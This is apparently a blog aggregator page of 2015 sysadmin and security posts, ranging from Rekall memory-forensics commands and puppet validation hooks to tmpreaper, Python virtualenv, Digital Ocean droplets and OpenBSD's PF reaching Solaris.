Four quick steps with Rekall and we’ve, in essence, reversed the steps described in the attack phase.
Remember too, we could just as easily have conducted these same steps on a live victim system with the same plugins via the following:
rekal -f \\.\pmem netstat
rekal -f \\.\pmem pstree
rekal -f \\.\pmem malfind pid=1284, dump_dir="/tmp/"
rekal -f \\.\pmem memdump pid=2396, dump_dir="/tmp/"

In Conclusion

In celebration of the annual infosec tools edition, we've definitely gone a bit hog wild, but I have to imagine you'll find this level of process and detail as useful as I have. Michael and team have done wonderful work with Rekall and WinPmem. I'd love to hear your feedback on your usage, particularly with regard to close, cooperative efforts between your red and blue teams. If you're not using these tools yet, you should be, and I recommend a long, hard look at GRR as well. I'd also like to give more credit where it's due. In addition to Michael Cohen, other tools and tactics here were developed and shared by people who deserve recognition. They include Microsoft's Mike Fanning, root9b's Travis Lee (@eelsivart), and Laconicly's Billy Rios (@xssniper). Thank you for everything, gentlemen.
Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month.


Michael Cohen, Rekall/GRR developer and project lead (@scudette)

by Russ McRee at May 01, 2015 03:50 PM


Career Advice: Becoming a System Administrator

Recently, I got an email that went something like this:

I have completed a BTech in Electronics and Communication. Now, I am working as a desktop engineer. How can I move my career to the network / server side?

Career moves are hard for everyone. Personally, I've been thinking about making a change in my career for a long time as well. I have two recommendations for you:

1) If your current employer has a policy of hiring from within, keep your eyes open for opportunities within your own organization. Since your current company already has you onboard, they are motivated to hire you. If you've already shown your value to the company in your existing position, you are even more likely to get that chance.

2) I'm assuming that you are having a hard time getting your foot in the door with network / server administrator positions. Many hiring managers do not want to take a risk on an unknown or unproven candidate when there are so many candidates out there. To put them at ease, you might consider a certification or two in the area you are most interested in working. For example, becoming an MCSE is one way to prove your expertise as a Windows server administrator.

Best of luck!

by Scott Hebert at May 01, 2015 01:00 PM

April 30, 2015


The Need for Test Data

Last week at the RSA Conference, I spoke to several vendors about their challenges offering products and services in the security arena. One mentioned a problem I had not heard before, but which made sense to me. The same topic will likely resonate with security researchers, academics, and developers.

The vendor said that his company needed access to large amounts of realistic computing evidence to test and refine their product and service. For example, if a vendor develops software that inspects network traffic, it's important to have realistic network traffic on hand. The same is true of software that works on the endpoint, or on application logs.

Nothing in the lab is quite the same as what one finds in the wild. If vendors create products that work well in the lab but fail in production, no one wins. The same is true for those who conduct research, either as coders or academics.

When I asked vendors about their challenges, I was looking for issues that might meet the criteria of Allan Friedman's new project, as reported in the Federal Register: Stakeholder Engagement on Cybersecurity in the Digital Ecosystem. Allan's work at the Department of Commerce seeks "substantive cybersecurity issues that affect the digital ecosystem and digital economic growth where broad consensus, coordinated action, and the development of best practices could substantially improve security for organizations and consumers."

I don't know if "realistic computing evidence" counts, but perhaps others have ideas that are helpful?

by Richard Bejtlich at April 30, 2015 09:22 PM

April 27, 2015

Michael Biven

We’ve not solved all of the problems we think we have with DevOps

After attending DevOpsDays Rockies, I have to say it was an amazing event, and both the organizers and sponsors have my thanks for putting together such a well-run two-day conference.

And it was also nice seeing two former coworkers again and listening to them as they participated in the ChatOps panel.

The Tools Don’t Matter

It was encouraging to see what I thought was an undercurrent of “it’s the people and not the tools” theme happening throughout most of the talks and open spaces.

Matt Stratton from Chef talked about “Managing Your Mental Stack” and Royce Haynes from Next Big Sound described his experience “Operating in a self-managed and self-organized company”. Both reflected this theme in a very direct way. Along with Dave Josephsen from Librato who gave a lighting talk called “Good to meet you; I’m an impostor here myself”. His message of we need less of us and more of you was very encouraging and I wish more people would follow that advice. And at least two different open spaces dealt with the people side of things… “How to escape the echo chamber” and “creating cohesion throughout all departments”.

Being technical people, we tend to forget that most problems boil down to a communication breakdown or some other issue arising from people interacting with each other.

But what stood out to me the most after having attended the first and third DevOpsDays held in the US is that we are still struggling with the same questions we had five years ago.

As a professional community we’ve been focused on the tools side of things and haven’t addressed the people and management aspects of what we were asking about in 2010.

This is reflected in two common topics brought up by attendees I talked with or heard from during the open spaces: how to bring a DevOps approach to their current workplace, and how to communicate their needs and justify them to management or other teams.

That we’re still asking how to get started makes me wonder whether, as a community, we are doing enough to show others how, and whether we actually even know what our own needs are.

Being people, we still have issues with focusing on the tasks at hand, and if you consider the amount of new technology and information released throughout the year, we shouldn’t be surprised that this is an issue.

The pace of using a new technology or technique to the point that you understand it and have an informed opinion of it will probably always be slower than the release of the next new thing. How can we expect ourselves to make good choices if we’re constantly moving from one thing to the next?

By focusing on the tools or the technology instead of the problem we’ve not advanced as far as we may think we have. It’s like we continue to just scratch the surface of the problem and then have another configuration management, deploy framework, or monitoring service introduced that we then consider and never really go beyond that. And now we have containers and related frameworks added to that menagerie of things we’ve been focused on.

I mean, we’re still talking about the benefits of infrastructure as code, monitoring, and testing as if they were new things.

Consider the following six titles of talks given at various DevOpsDays. Can you pick which ones are from about five years ago or more?

Infrastructure as code

DevOps requires visibility

5 Common Barriers when Introducing Devops

Making the business case

Continuous Integration, Pipelines and Deployment

Changing culture to enable DevOps

To put a bit of a gap between you and the answer to that question, watch the short five-minute intro video that was shown at the first DevOpsDays in Mountain View in 2010.

Five of those titles are talks from DevOpsDays in 2010 and 2011. The odd man out is the “5 Common Barriers when Introducing Devops” talk that was given during DevOpsDays Silicon Valley 2014. Yet any of these could have easily been a talk given more recently.

Our profession is more than just a slide deck, and this is not to diminish the information shared by any presenter. It is to say that we need to take these little sparks of ideas and information and build upon them, using them as a cue to dig deeper into the problems we keep talking about. Otherwise, in my opinion, it feels more like we’re treading water than making the advancements we could be making.

April 27, 2015 03:30 PM

Steve Kemp's Blog

Validating puppet manifests via git hooks.

It looks like I'll be spending a lot of time working with puppet over the coming weeks.

I've setup some toy deployments on virtual machines, and have converted several of my own hosts to using it, rather than my own slaughter system.

When it comes to puppet some things are good and some things are bad, as expected with any similar tool (even my own). At the moment I'm just aiming for consistency and making sure I can control all the systems - BSD, Debian GNU/Linux, Ubuntu, Microsoft Windows, etc.

Little changes are making me happy though - rather than using a local git pre-commit hook to validate puppet manifests I'm now doing that checking on the server-side via a git pre-receive hook.

Doing it on the server-side means that I can never forget to add the local hook, and future colleagues can never make that mistake either and commit malformed puppetry.

It is almost a shame there isn't a decent collection of example git-hooks, for doing things like this puppet-validation. Maybe there is and I've missed it.

It only crossed my mind because I've had to write several of these recently - a hook to rebuild a static website when the repository has a new markdown file pushed to it, a hook to validate syntax when pushes are attempted, and another hook to deny updates if the C-code fails to compile.
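Server-side validation like this can be sketched as a small pre-receive hook. Everything below is an assumption rather than my actual hook: it presumes `puppet` is on the hook's PATH, and it skips filenames containing whitespace to keep the sketch short.

```shell
#!/bin/sh
# Sketch of a git pre-receive hook that validates every .pp file
# reachable in a pushed revision with `puppet parser validate`.

validate_rev() {
    rev=$1
    rc=0
    for f in $(git ls-tree -r --name-only "$rev" | grep '\.pp$'); do
        tmp=$(mktemp -d)
        # Extract the pushed blob, since it isn't checked out on the server.
        git show "$rev:$f" > "$tmp/check.pp"
        if ! puppet parser validate "$tmp/check.pp"; then
            echo "rejecting push: $f fails 'puppet parser validate'" >&2
            rc=1
        fi
        rm -rf "$tmp"
    done
    return $rc
}

# In the real hook, git feeds "<oldrev> <newrev> <refname>" on stdin:
#
#   status=0
#   while read oldrev newrev refname; do
#       validate_rev "$newrev" || status=1
#   done
#   exit $status    # non-zero makes git refuse the push
```

Dropped into hooks/pre-receive on the server (and made executable), a single failing manifest then rejects the whole push.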

April 27, 2015 12:00 AM

April 23, 2015


I'm not a developer but...

...I'm sure spending a lot of time in code lately.

Really. Over the last five months, I'd say that 80% of my normal working hours are spent grinding on puppet code. Or training others in getting them to maybe do some puppet stuff. I've even got some continuous integration work in, building a trio of sanity-tests for our puppet infrastructure:

  • 'puppet parser validate' returns OK for all .pp files.
    • Still on the 'current' parser, we haven't gotten as far as future/puppet4 yet.
  • puppet-lint returns no errors for the modules we've cleared.
    • This required extensive style-fixes before I put it in.
  • Catalogs compile for a certain set of machines we have.
    • I'm most proud of this, as this check actually finds dependency problems, unlike plain parser validation.
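Strung together, the three checks might look something like the function below. This is only a sketch: the module paths, the list of lint-cleared modules, and the node names are all hypothetical, and the catalog step uses the Puppet 3-era `puppet master --compile` invocation (newer Puppet releases expose this differently).

```shell
# Hypothetical CI gate tying the three sanity tests together.
puppet_sanity() {
    # 1. 'puppet parser validate' must return OK for all .pp files.
    find modules manifests -name '*.pp' \
        -exec puppet parser validate {} + || return 1

    # 2. puppet-lint must return no errors for the cleared modules.
    for m in modules/ntp modules/users; do      # hypothetical list
        puppet-lint --fail-on-warnings "$m" || return 1
    done

    # 3. Catalogs must compile for a representative set of machines;
    #    this is the check that actually finds dependency problems.
    for n in web01.example.com db01.example.com; do
        puppet master --compile "$n" > /dev/null || return 1
    done
}
```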

Completely unsurprisingly, the CI stuff has actually caught bugs before they got pushed to production! Whoa! One of these days I'll be able to grab some of the others and demo this stuff, but we're off-boarding a senior admin right now and the brain-dumping is not being done by me for a few weeks.

We're inching closer to getting things rigged that a passing-build in the 'master' branch triggers an automatic deployment. That will take a bit of thought about, as some deploys (such as class-name changes) require coordinated modifications in other systems.

by SysAdmin1138 at April 23, 2015 07:30 PM

The Tech Teapot

Observations on 8 Issues of C# Weekly

At the end of 2013 I thought it would be interesting to create a C# focused weekly newsletter. I registered the domain, created a website, and hooked it up to the excellent MailChimp email service. The site went live (or at least Google Analytics was added to the site) on the 18th December 2013.

And then I kind of forgot about it for a year or so.

In the meantime the website was getting subscribers. Not many, but enough to suggest that there’s an appetite for a weekly C# focused newsletter.

The original website was a simple affair, just a standard landing page written using Bootstrap. Simple it may have been, but rather effective.

I figured that I might as well give the newsletter a go. Whilst the audience wasn’t very big (it still isn’t), it was big enough to give some idea whether the newsletter was working or not.

Having now curated eight issues, I thought it about time to take stock. The first issue was sent on Friday 27th February 2015, and one has been sent every Friday since.

C# Weekly Subscriber Chart

C# Weekly Subscribers

The number of subscribers has grown over the last eight weeks: starting from a base of 194 subscribers, there are now 231, a net increase of 37 in eight weeks. Of course there have been unsubscribes, but the new subscribers each week have always outnumbered them.

C# Weekly Website Visitors Chart

C# Weekly Website Visitors

The website traffic has also trended upwards over the last year, especially since the first issue was curated. Now that there are a number of pages on the website, the site is receiving more traffic from the search engines. The number of visitors is not high, but at least progress is being made.

I started a Google AdWords campaign for the newsletter fairly early on. The campaign was reasonably successful while it lasted. Unfortunately, the website must have tripped some kind of filter, because the campaign was stopped. A pity, because the campaign did convert quite well. I did appeal the decision and was informed that Google didn’t like the fact that the site doesn’t have a business model and that it links out to other websites a lot. Curiously, both charges could have been levelled at Google in its early days.

The weekly newsletter itself is a lot of fun to produce. During the week I look out for interesting and educational C# related content and tweet it via the @C# Weekly twitter account. I then condense all of the twitter content into a single email once a week on a Friday. Not all of the tweeted content makes it into the weekly issue. There is often overlap between content produced during the week so I get to choose what’s best.

The job of curating does take longer than I originally anticipated. I suspect that each issue takes the better part of a day to produce, which is probably twice the time I anticipated. Perhaps, when I’m more experienced, I will be able to reduce the time taken to produce the issue without reducing the quality.

Time will tell.

I can certainly recommend curating a newsletter from the perspective of learning about the topic. Even after only eight weeks I feel like I have learned quite a lot about C# that I wouldn’t otherwise have known, especially about the upcoming C# version 6.

One of my better ideas over the last year was to move over to Curated, a newsletter service provider founded by the folks who run the very successful iOS Dev Weekly newsletter. The tools provided by Curated have helped a lot.

C# Weekly Content Interaction Stats Chart

C# Weekly Content Interaction Statistics

One of the best features of Curated is the statistics it provides for each issue. You can learn a lot from discovering which content subscribers are most interested in. You won’t be surprised to find that the low level C# content is the most popular.

The only minor problem I’ve found is that my dog-eared old site actually converted subscribers at a higher rate than my current site. The version 1 site was converting at around 18% whereas the current site is converting at around 13%.

I have a few ideas around why the conversion rate has dropped. The current site is a bit drab and needs to be spruced up a little bit. In addition, the current site displays previous issues, including the most recent issue on the home page. I wonder if having content on the home page actually distracts people from subscribing.

All told curating a newsletter is fun. I can thoroughly recommend it. :)

by Jack Hughes at April 23, 2015 03:10 PM

April 20, 2015


Why Isn't tmpreaper Working?

If you have a directory that you want to keep clean, tmpreaper is a great way to remove files based on how old they are. The other day, I had a directory that looked like this:

x@x:~/dump$ ls -l
-rw-r--r-- 1 x x 212268169 Mar 15 01:02 x-2015-03-15.sql.gz
-rw-r--r-- 1 x x 212270156 Mar 16 01:02 x-2015-03-16.sql.gz
-rw-r--r-- 1 x x 212276275 Mar 17 01:02 x-2015-03-17.sql.gz
-rw-r--r-- 1 x x 212308369 Mar 18 01:02 x-2015-03-18.sql.gz
-rw-r--r-- 1 x x 212315343 Mar 19 01:02 x-2015-03-19.sql.gz
-rw-r--r-- 1 x x 212324575 Mar 20 01:02 x-2015-03-20.sql.gz
-rw-r--r-- 1 x x 212341738 Mar 21 01:02 x-2015-03-21.sql.gz
-rw-r--r-- 1 x x 212375590 Mar 22 01:02 x-2015-03-22.sql.gz
-rw-r--r-- 1 x x 212392563 Mar 23 01:02 x-2015-03-23.sql.gz

I decided that I didn't need those SQL dumps older than 30 days, so I would use tmpreaper to clean them. The proper command is

tmpreaper +30d /home/x/dump

I added the --test flag just to make sure my command would work. But, alas! Nothing happened:

x@x:~/dump$ tmpreaper --test +30d /home/x/dump
(PID 4057) Pretending to clean up directory `/home/x/dump'.

That's when I realized that this is the directory where I had recently recompressed all the files using gzip -9 to get better compression. Although ls was reporting the files' original modification times (which gzip preserves when recompressing), that is not the time tmpreaper was looking at: by default it checks atime, which the recompression had just updated. You can see that the files were in fact touched recently if you use ls -lc, which shows ctime instead:

x@x:~/dump$ ls -lc
total 7863644
-rw-r--r-- 1 x x 212268169 Apr 11 03:03 x-2015-03-15.sql.gz
-rw-r--r-- 1 x x 212270156 Apr 11 03:06 x-2015-03-16.sql.gz
-rw-r--r-- 1 x x 212276275 Apr 11 03:09 x-2015-03-17.sql.gz
-rw-r--r-- 1 x x 212308369 Apr 11 03:12 x-2015-03-18.sql.gz
-rw-r--r-- 1 x x 212315343 Apr 11 03:15 x-2015-03-19.sql.gz
-rw-r--r-- 1 x x 212324575 Apr 11 03:17 x-2015-03-20.sql.gz
-rw-r--r-- 1 x x 212341738 Apr 11 03:20 x-2015-03-21.sql.gz
-rw-r--r-- 1 x x 212375590 Apr 11 03:23 x-2015-03-22.sql.gz
-rw-r--r-- 1 x x 212392563 Apr 11 03:26 x-2015-03-23.sql.gz

In order to have tmpreaper look at the proper timestamp, use the --mtime flag:

x@x:~/dump$ tmpreaper --mtime --test +30d /home/x/dump
(PID 4362) Pretending to clean up directory `/home/x/dump'.
Pretending to remove file `/home/x/dump/x-2015-03-20.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-17.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-21.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-15.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-22.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-18.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-19.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-16.sql.gz'.
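The difference between the timestamps is easy to see with GNU coreutils stat, which prints all three. A throwaway sketch (the file name is arbitrary):

```shell
# Give a throwaway file an old mtime, then inspect all three timestamps.
touch -d '40 days ago' demofile
stat -c 'atime: %x%nmtime: %y%nctime: %z' demofile
# mtime (and atime) are ~40 days back, but ctime is "now": changing the
# timestamp itself modified the inode, just as recompressing the files did.
```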

by Scott Hebert at April 20, 2015 04:12 PM

Standalone Sysadmin

Reminder (to self, too): Use Python virtualenv!

I’m really not much of a programmer, but I dabble at times, in order to make tools for myself and my colleagues. Or toys, like the time I wrote an entire MBTA library because I wanted to build a Slack integration for the local train service.

One of the things that I want to learn better, because it seems so gosh-darned helpful, is Python. I’m completely fluent (though non-expert level) in both Bash and PHP, so I’m decent at writing systems scripts and web back-ends, but I’m only passingly familiar with Perl. The way I see it, the two “modern” languages that get the most use in systems scripts are Python and Ruby, and it’s basically a toss-up for me as to which to pick.

Python seems a little more pervasive, although Ruby has the benefit of basically being the language of our systems stack. Puppet, Foreman, logstash, and several other tools are all written in Ruby, and there’s a lot to be said for being fluent in the language of your tools. That being said, I’m going to learn Python because it seems easier and honestly, flying sounds so cool.


One of the things that a lot of intro-to-Python tutorials don’t give you is the concept of virtual environments. These are actually pretty important in a lot of ways. You don’t absolutely need them, but you’re going to make your life a lot better if you use them. There’s a really great bit on why you should use them on the Python Guide, but basically, they create an entire custom python environment for your code, segregated away from the rest of the OS. You can use a specific version of python, a specific set of modules, and so on (with no need for root access, since they’re being installed locally).

Installing virtualenv is pretty easy. You may be able to install it with your system’s package manager, or you may need to use pip. Or you could use easy_install. Python, all by itself, has several package managers. Because of course it does.

Setting up a virtual environment is straightforward, if a little kludgy-feeling. If you find that you’re going to be moving it around, maybe from machine to machine or whatever, you should probably know about the --relocatable flag.

By default, the workflow is basically: create a virtual environment, “activate” it (which mangles lots of environment variables and paths, so that Python-specific stuff runs local to the environment rather than across the entire server), configure it by installing the modules you need, write/execute your code as normal, and then deactivate the environment when you’re done, which restores all of your original environment settings.

There is also a piece of software called virtualenvwrapper that is supposed to make all of this easier. I haven’t used it, but it looks interesting. If you find yourself really offended by the aforementioned workflow, give it a shot and let me know what you think.

Also as a reminder, make sure to put your virtual environment directory in your .gitignore file, because you’re definitely using version control, right? (Right?) Right.

Here’s how I use virtual environments in my workflow:

msimmons@bullpup:~/tmp > mkdir mycode
msimmons@bullpup:~/tmp > cd mycode
msimmons@bullpup:~/tmp/mycode > git init
Initialized empty Git repository in /home/msimmons/tmp/mycode/.git/
msimmons@bullpup:~/tmp/mycode > virtualenv env
New python executable in env/bin/python
Installing setuptools, pip...done.
msimmons@bullpup:~/tmp/mycode > echo "env" > .gitignore
msimmons@bullpup:~/tmp/mycode > git add .gitignore # I always forget this!
msimmons@bullpup:~/tmp/mycode > source env/bin/activate
(env)msimmons@bullpup:~/tmp/mycode >
(env)msimmons@bullpup:~/tmp/mycode > which python
/home/msimmons/tmp/mycode/env/bin/python
(env)msimmons@bullpup:~/tmp/mycode > deactivate
msimmons@bullpup:~/tmp/mycode > which python
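As a side note, on Python 3.3+ the same workflow is available from the standard library via the venv module, so no extra installs are needed. A minimal sketch (the directory name env is just a convention):

```shell
# Stdlib equivalent of the virtualenv workflow on Python 3.3+.
python3 -m venv env                  # create the environment
. env/bin/activate                   # activate: PATH now prefers env/bin
python -c 'import sys; print(sys.prefix)'   # prints a path inside env/
pip freeze > requirements.txt        # record installed modules for later
deactivate                           # restore the original environment
```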

by Matt Simmons at April 20, 2015 01:15 PM

April 18, 2015

The Lone Sysadmin

When Should I Upgrade to VMware vSphere 6?

I’ve been asked a few times about when I’m planning to upgrade to VMware vSphere 6. Truth is, I don’t know. A Magic 8 Ball would say “reply hazy, try again.” Some people say that you should wait until the first major update, like the first update pack or first service pack. I’ve always thought […]

The post When Should I Upgrade to VMware vSphere 6? appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at April 18, 2015 05:38 AM

April 17, 2015

Sean's IT Blog

Looking Ahead To the Future

“You might feel that somehow, you’ve lost all your fizz.
Or you’re frazzled like a…um…frazzled thing.  I’m not sure what it is.”
From Happy Hippo, Angry Duck by Sandra Boynton

For the last year and a half, I’ve worked for Faith Technologies, a large electrical contractor with offices in five states, in Menasha, WI.  I have a great manager who has encouraged me to grow and get involved in the greater IT community.  That manager has also led one of the best teams I’ve worked on to date.

While I have learned and accomplished a great deal in this role, it is time to move on.  Today is my last day with Faith.

While Faith is a great company, and I have a great manager and work on a great team, I didn’t see a path forward to reach goals that I had set for myself. 

I will be starting a new role on Tuesday of next week.  My new role is a big change for me, as I will be moving from the customer side over to a partner. I’ll be going to work with another awesome team, and I’m looking forward to the challenges that this new role will bring.

by seanpmassey at April 17, 2015 01:34 PM

April 16, 2015

The Tech Teapot

The evils of the dashboard merry-go-round

What is the first thing you do when you get to the office? Check your email probably. Then what? I bet you go through the same routine of checking your dashboards to see what’s happened overnight.

That is exactly what I do every single morning at work.

And I keep checking those dashboards throughout the day. Sometimes I manage to get myself in a loop, continuing around and around the same set of dashboards.

I can pretty much guarantee that nothing will have changed significantly. Certainly not to the point where some action is necessary.

How many times do you check some dashboard and then action something? Me? Very rarely, if ever.

The Problem

I call this obsessive need to view all of my various dashboards my dashboard merry-go-round.

The merry-go-round is particularly a problem with real time stats. When Google Analytics implemented real time stats, I guarantee that webmaster productivity plummeted the very next day.

But the merry-go-round is not confined to Google Analytics or even website statistics. Any kind of statistics will do.

It is a miracle I manage to do any work. One of the most seductive things about the constant dashboard merry-go-round is that it feels like work. There you are frantically pounding away quickly moving between your various dashboards. It even looks to everybody else like work. Your boss probably thinks you’re being really productive.

The problem is that there is no action. There is no end result.

You log into Google Analytics, go to the “Real-Time” section, you discover that there are five people browsing your site. On pages X, Y, and Z.

So what. You are not getting any actionable information from this.

You then go to the other three sites you’ve got in Google Analytics. Rinse and repeat.


The obvious solution is to just stop. But if it was as simple as that, you’d already have stopped and so would I.


One of the things you are trying to do by going into your dashboards is to see what’s changed. Has anything interesting happened? One way you can short circuit this is to configure the dashboard to tell you when something interesting has happened.

I use the Pingdom service to monitor company websites and I almost never go into the Pingdom dashboard. Why? Because I’ve configured the service to send me a text message to my mobile whenever a website goes down. If I don’t receive a text, then there’s no need to look at the dashboard.

Notifications do come with a pretty big caveat: you must trust your notifications. If I can’t rely on Pingdom to tell me when my sites are down, I may be tempted to go dashboard hunting.

Even if your systems are only capable of sending email alerts, you can still turn those into mobile friendly notifications and even phone call alerts using services like PagerDuty, OpsGenie and VictorOps.

Instead of needing a mobile phone app for each service you run, you can merge all of your alerts into a single app with mobile notifications.

If you haven’t received a notification, then you don’t need to go anywhere near the dashboard. Every time you think about going there just remind yourself that, if there was a problem, you’d already know about it.

Time Management Techniques

Pomodoro Technique or Timeboxing or … lots of other similar techniques.

None of the time management techniques will of themselves cure your statsitus; they just move it into your own “pomodori”, or the time in between your productive tasks. If you want to sacrifice your own leisure time to stats, then go nuts. But at least you’re getting work done in the meantime.

The Writers’ Den

One technique writers use to be more productive is the writer’s den. The idea is you set aside a space with as few distractions as possible, including a PC with just the software you need to work and that isn’t connected to the internet.

Not a bad idea, but unfortunately, a lot of us can’t simply switch the internet off. We either work directly with internet connected applications or we need to use reference materials only available on the web.

As ever, there are software solutions that can restrict access to sites at pre-defined times of the day. You could permit yourself free access for the first half hour of work, and then again just before you leave, leaving a large chunk of your day for productive work.

The drawback with systems that restrict access is that, as you are likely to be the person setting up the system, you’re also likely to be able to circumvent it quite easily too.


For me, dashboards and stats can be both a boon and a curse at the same time. They can hint at problems and actions you need to take, but they can also suck an awful lot of time out of your day.

I’ve found that a combination of time management and really good notifications is a great way to stop the dashboard merry-go-round and put stats in their rightful place: a tool to help you improve, not an end in themselves.

The problem with concentrating too much on statistics is that it is so seductive. It feels like you are working hard but, in the end, if there are no actions coming out of the constant stats watching, then it is all wasted effort.

If you have any hints and tips how you overcame your dashboard merry-go-round, please leave a comment. :)

[Picture is of a French old-fashioned style carousel with stairs in La Rochelle, by Jebulon (own work), licensed GFDL or CC BY-SA 3.0, via Wikimedia Commons]

by Jack Hughes at April 16, 2015 03:26 PM

April 15, 2015

Standalone Sysadmin

Spinning up a quick cloud instance with Digital Ocean

This is another in a short series of blog posts that will be brought together like Voltron to make something even cooler, but it’s useful on its own. 

I’ve written about using a couple other cloud providers before, like AWS and the HP cloud, but I haven’t actually mentioned Digital Ocean yet, which is strange, because they’ve been my go-to cloud provider for the past year or so. As you can see on their technology page, all of their instances are SSD backed, they’re virtualized with KVM, they’ve got IPv6 support, and there’s an API for when you need to automate instance creation.
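That API is a straightforward JSON-over-HTTPS affair. A hedged sketch of creating a droplet with v2 of the API, where the token, SSH key ID, and the size/image slugs are all placeholders you'd swap for your own:

```shell
# Build the request body first so it can be eyeballed before sending.
cat > droplet.json <<'EOF'
{"name": "test-droplet", "region": "nyc3", "size": "512mb",
 "image": "ubuntu-14-04-x64", "ssh_keys": [123456]}
EOF

# Send it only if a token is configured (placeholder environment variable).
if [ -n "${DO_API_TOKEN:-}" ]; then
    curl -X POST 'https://api.digitalocean.com/v2/droplets' \
        -H 'Content-Type: application/json' \
        -H "Authorization: Bearer $DO_API_TOKEN" \
        -d @droplet.json
else
    echo 'set DO_API_TOKEN to actually create the droplet'
fi
```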

To be honest, I’m not automating any of it. What I use it for is one-off tests. Spinning up a new “droplet” takes less than a minute, and unlike AWS, where there are a ton of choices, I click about three buttons and get a usable machine for whatever I’m doing.

To get the most out of it, the first step you need to do is to generate an SSH key if you don’t have one already. If you don’t set up key-based authentication, you’ll get the root password for your instance in your email, but ain’t nobody got time for that, so create the key using ssh-keygen (or if you’re on Windows, I conveniently covered setting up key-based authentication using pageant the other day – it’s almost like I’d planned this out).

Next, sign up for Digital Ocean. You can sign up directly, or you can get $10 for free by using my referral link (and I’ll get $25 in credit eventually).  Once you’re logged in, you can create a droplet by clicking the big friendly button:

This takes you to a relatively limited number of options - but limited in this case isn’t bad. It means you can spin up what you want without fussing over most of the details. You’ll be asked for your droplet’s hostname (which will be used to refer to the instance in the Digital Ocean interface and will also actually be set as the hostname of the created machine), and you’ll need to specify the size of the machine you want (at the current moment, here are the prices:)

The $10/mo option is conveniently highlighted, but honestly, most of my test stuff runs perfectly fine on the $5/mo, and most of my test stuff never runs for more than an hour, and 7/1000 of a dollar seems like a good deal to me. Even if you screw up and forget about it, it’s $5/mo. Just don’t set up a 64GB monster and leave that bad boy running.

Next there are several regions. For me, New York 3 is automatically selected, but I can override that default choice if I want. I just leave it, because I don’t care. You might care, especially if you’re going to be providing a service to someone in Europe or Asia.

The next options are for settings like Private Networking, IPv6, backups, and user data. Keep in mind that backups cost money (duh?), so don’t enable that feature for anything you don’t want to spend 20% of your monthly fee on.

The next option is honestly why I love Digital Ocean so much. The image selection is so painless and easy that it puts AWS to shame. Here:

You can see that the choice defaults to Ubuntu current stable, but look at the other choices! Plus, see that Applications tab? Check this out:

I literally have a GitLab install running permanently in Digital Ocean, and the sum total of my effort was 5 seconds of clicking that button, and $10/mo (it requires a gig of RAM to run the software stack). So easy.

It doesn’t matter what you pick for spinning up a test instance, so you can go with the Ubuntu default or pick CentOS, or whatever you’d like. Below that selection, you’ll see the option for adding SSH keys. By default, you won’t have any listed, but you have a link to add a key, which pops open a text box where you can paste your public key text. The key(s) that you select will be added to the root user’s ~/.ssh/authorized_keys file, so that you can connect without knowing the password. The machine can then be configured however you want. (Alternatively, when selecting which image to spin up, you can choose a previously-saved snapshot, backup, or old droplet, pre-configured by you to do what you need.)

Click Create Droplet, and around a minute later, you’ll have a new entry in your droplet list that gives you the public IP to connect to. If you spun up a vanilla OS, SSH into it as the root user with one of the keys you specified, and if you selected one of the apps from the menu, try connecting to it over HTTP or HTTPS.

That’s really about it. In an upcoming entry, we’ll be playing with a Digital Ocean droplet to do some cool stuff, but I wanted to get this out here so that you could start playing with it, if you don’t already. Make sure to remember, though, that whenever you’re done with your machine, you need to destroy it rather than just shut it down. Shutting it down makes it unavailable but keeps the data around, which means you’ll keep getting billed for it. Destroying it erases the data and removes the instance, which is what stops the billing.

Have fun, and let me know if you have any questions!

by Matt Simmons at April 15, 2015 01:00 PM

April 12, 2015

That grumpy BSD guy

Solaris Admins: For A Glimpse Of Your Networking Future, Install OpenBSD

Yet another proprietary tech titan turns to the free OpenBSD operating system as their source of innovation in the networking and security arena.

Roughly a week ago, on April 5th, 2015, parts of Oracle's roadmap for upcoming releases of their Solaris operating system were leaked in a message to the public OpenBSD tech developer mailing list. This is notable for several reasons; one is that Solaris, then owned and developed by the (now defunct) Sun Microsystems, was the original development platform for Darren Reed's IP Filter, more commonly known as IPF, which in turn was the software PF was designed to replace.

IPF was the original firewall in OpenBSD, and had at the time also been ported to NetBSD, FreeBSD and several other systems. However, over time IPF appears to have fallen out of favor almost everywhere, and as the (perhaps not quite intended as such) announcement has it,

IPF in Solaris is on its death row.
Which can reasonably be taken to mean that Oracle, like the OpenBSD project back in 2001 but possibly not for the same reasons, is abandoning the legacy IP Filter code base and moving on to something newer:

PF in 11.3 release will be available as optional firewall. We hope to make PF default (and only firewall) in Solaris 12. You've made excellent job, your PF is crystal-clear design.
Perhaps due to Oracle's practice of putting beta testers under non-disclosure agreements, or possibly because essentially no tech journalists ever read OpenBSD developer-focused mailing lists, Oracle's PF plans have not generated much attention in the press.

I personally find it quite interesting that the Oracle Solaris team are apparently taking in the PF code from OpenBSD. As far as I'm aware release dates for Solaris 11.3 and 12 have not been announced yet, but looking at the release cycle churn (check back to the Wikipedia page's Version history section), it's reasonable to assume that the first Solaris release with PF should be out some time in 2015.

The OpenBSD packet filter subsystem PF is not the first example of OpenBSD-originated software ending up in other projects or even in commercial, proprietary products.

Basically every Unix out there ships some version of OpenSSH, which is developed and maintained as part of the OpenBSD project, with a -portable flavor maintained in sync for others to use (a model that has been adopted by several other OpenBSD associated projects, such as the OpenBGPD routing daemon, the OpenSMTPD mail daemon, and most recently, the LibreSSL TLS library). The portable flavors have generally seen extensive use outside the OpenBSD sphere, such as in Linux distributions and other Unixes.

The interesting thing this time around is that Oracle are apparently now taking their PF code directly from OpenBSD, in contrast to earlier code recipients such as Blackberry (who became PF consumers via NetBSD) and Apple, whose main interface with the world of open source appears to be the FreeBSD project; Apple's one exception was the time the FreeBSD project was a little too slow in updating their PF code, and Apple ported over a fresher version themselves, adding some features under their own, non-compatible license.

Going back to the possibly unintended announcement, the fact that the Oracle developers produced a patch against OpenBSD-current, which was committed only a few days later, indicates that most likely they are working with fairly recent code and are probably following OpenBSD development closely.

